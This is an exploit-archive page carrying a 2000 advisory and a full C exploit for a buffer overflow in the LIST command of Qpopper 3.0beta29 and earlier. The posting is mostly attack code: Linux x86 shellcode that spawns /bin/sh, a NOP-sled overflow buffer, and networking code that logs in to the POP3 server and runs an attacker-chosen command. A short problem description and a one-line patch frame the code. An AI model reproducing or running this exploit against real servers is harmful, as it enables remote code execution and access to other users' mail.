exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

qpop-exploit-net.c

qpop-exploit-net.c
Posted Jan 28, 2000
Authored by Missinglnk | Site tribune.intranova.net

A modified version of the original qpopper 3.0beta29 exploit by Zhodiac, added network support (no need for netcat) and allowed the user to specify which command to execute.

tags | exploit
SHA-256 | bcdd1859b2a33b6f0bdced21cd68b20e314cb4ff2fe1dafccab9dfb8f9a3be82

qpop-exploit-net.c

Change Mirror Download
 !Hispahack Research Team
http://hispahack.ccc.de

Program: Qpopper <= 3.0beta29 (2.53 and olders are not vulnerable)
Platform: *nix
Risk: Remote access
Author: Zhodiac <zhodiac@softhome.net>
Date: 20/1/2000


- Problem:
===========

The, nowadays, so common qpop pop3 server is one of the best server
which implements some features added not in normal pop3d. Like almost all
software it has some security bugs. In this case, once you pass the
login process you can execute malicious code due to a buffer overflow.

With this buffer overflow (second argument of the LIST command) you
can execute malicious code with the uid of the user you logged in, and
with gid mail. Due to have gid mail, in some systems you can read all the
mail of other users and even change/delete it.


- Exploit:
==========

For proof of vulnerability we release the Linux x86 xploit. But be
aware, no public xploit for your system does not mean you can't be
hacked. Vulnerability exists, fix it!

------- qpop-xploit.c ----------

Modified by missnglnk <missnglnk@tribune.intranova.net>
Allows you to specify the command to execute and added network support
so netcat, is no longer needed.

/*
* !Hispahack Research Team
* http://hispahack.ccc.de
*
* By Zhodiac <zhodiac@softhome.net>
*
* Linux (x86) Qpopper xploit 3.0beta29 or lower (not 2.53)
* Overflow at pop_list()->pop_msg()
*
* Tested: 3.0beta28 offset=0
* 3.0beta26 offset=0
* 3.0beta25 offset=0
*
* #include <standar/disclaimer.h>
*
* This code is dedicated to my love [CrAsH]] and to all the people who
* were raided in Spain in the last few days.
*
* Madrid 10/1/2000
*
* missnglnk <missnglnk@tribune.intranova.net>
* - Allows you to specify the command to execute on the remote host,
* and added network support to the program so you do not need netcat
* to use this.
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define BUFFERSIZE 1004
#define NOP 0x90
#define OFFSET 0xbfffd9c4
// #define OFFSET 0x0

char shellcode[]=
"\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa\x89\xf9\x89"
"\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04\x03\xcd\x80\x31\xdb\x89"
"\xd8\x40\xcd\x80\xe8\xd9\xff\xff\xff/bin/sh";


void usage(char *progname) {
fprintf(stderr,"Usage: (%s <hostname> <login> <password> <command> [<offset>]\n",progname);
exit(1);
}

int main(int argc, char **argv) {
char *ptr,buffer[BUFFERSIZE],rcvbuf[4096],username[128],password[128],exploit[4096],command[4096];
unsigned long *long_ptr,offset=OFFSET;
int aux,sock;
struct sockaddr_in sin;
unsigned long ip;
struct hostent *he;

fprintf(stderr,"\n!Hispahack Research Team (http://hispahack.ccc.de)\n");
fprintf(stderr,"Qpopper xploit by Zhodiac <zhodiac@softhome.net>\n\n");

if (argc<5) usage(argv[0]);

if (argc==6) offset+=atol(argv[5]);

ptr=buffer;
memset(ptr,0,sizeof(buffer));
memset(ptr,NOP,sizeof(buffer)-strlen(shellcode)-16);
ptr+=sizeof(buffer)-strlen(shellcode)-16;
memcpy(ptr,shellcode,strlen(shellcode));
ptr+=strlen(shellcode);
long_ptr=(unsigned long*)ptr;
for(aux=0;aux<4;aux++) *(long_ptr++)=offset;
ptr=(char *)long_ptr;
*ptr='\0';

fprintf(stderr,"Buffer size: %d\n",strlen(buffer));
fprintf(stderr,"Offset: 0x%lx\n\n",offset);

snprintf(username, sizeof(username), "USER %s\n",argv[2]);
snprintf(password, sizeof(password), "PASS %s\n",argv[3]);
snprintf(exploit, sizeof(exploit), "LIST 1 %s\n",buffer);
snprintf(command, sizeof(command), "%s\n", argv[4]);

if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
perror("socket()");
return -1;
}

if ((he = gethostbyname(argv[1])) != NULL) {
ip = *(unsigned long *)he->h_addr;
} else {
if ((ip = inet_addr(argv[1])) == NULL) {
perror("inet_addr()");
return -1;
}
}

sin.sin_family = AF_INET;
sin.sin_addr.s_addr = ip;
sin.sin_port = htons(110);

if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
perror("connect()");
return -1;
}

if (read(sock, rcvbuf, sizeof(rcvbuf)) < 0) {
perror("read()");
return -1;
}

if (strstr(rcvbuf, "+OK") == NULL) {
printf("Server didnt respond with ok\n");
rcvbuf[(strlen(rcvbuf) - 1)] = '\0';
printf("\t%s\n", rcvbuf);
return -1;
}

rcvbuf[(strlen(rcvbuf) - 1)] = '\0';
printf("\t%s\n", rcvbuf);
bzero(rcvbuf, sizeof(rcvbuf));

if (write(sock, username, strlen(username)) < strlen(username)) {
perror("write()");
return -1;
}

if (read(sock, rcvbuf, sizeof(rcvbuf)) < 0) {
perror("read()");
return -1;
}

if (strstr(rcvbuf, "+OK") == NULL) {
printf("Server didnt respond with username ok\n");
rcvbuf[(strlen(rcvbuf) - 1)] = '\0';
printf("\t%s\n", rcvbuf);
return -1;
}

rcvbuf[(strlen(rcvbuf) - 1)] = '\0';
printf("\t%s\n", rcvbuf);
bzero(rcvbuf, sizeof(rcvbuf));

if (write(sock, password, strlen(password)) < strlen(password)) {
perror("write()");
return -1;
}

if (read(sock, rcvbuf, sizeof(rcvbuf)) < 0) {
perror("read()");
return -1;
}

if (strstr(rcvbuf, "+OK") == NULL) {
printf("Server didnt respond with password ok\n");
rcvbuf[(strlen(rcvbuf) - 1)] = '\0';
printf("\t%s\n", rcvbuf);
return -1;
}

rcvbuf[(strlen(rcvbuf) - 1)] = '\0';
printf("\t%s\n", rcvbuf);
bzero(rcvbuf, sizeof(rcvbuf));

if (write(sock, exploit, strlen(exploit)) < strlen(exploit)) {
perror("write()");
return -1;
}

if (read(sock, rcvbuf, sizeof(rcvbuf)) < 0) {
perror("read()");
return -1;
}

rcvbuf[(strlen(rcvbuf) - 1)] = '\0';
printf("\t%s\n", rcvbuf);
bzero(rcvbuf, sizeof(rcvbuf));

if (write(sock, command, strlen(command)) < strlen(command)) {
perror("write()");
return -1;
}

if (read(sock, rcvbuf, sizeof(rcvbuf)) < 0) {
perror("read()");
return -1;
}

rcvbuf[(strlen(rcvbuf) - 1)] = '\0';
printf("\t%s\n", rcvbuf);
bzero(rcvbuf, sizeof(rcvbuf));

if (close(sock) < 0) {
perror("close()");
return -1;
}

return(0);
}

------- qpop-xploit.c ---------


- Fix:
======

Best solution is to wait for a new patched version, meanwhile here you
have a patch that will stop this attack (be aware that this patch was not
done after a total revision of the code, maybe there are some other
overflows).

------ pop_list.patch ---------

77c77
< return(pop_msg(p, POP_FAILURE,"Unknown LIST argument: %s",
---
> return(pop_msg(p, POP_FAILURE,"Unknown LIST argument: %.128s",

------ pop_list.patch ---------

piscis:~# patch pop_list.c pop_list.patch
piscis:~#

Spain r0x

Greets :)

Zhodiac
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close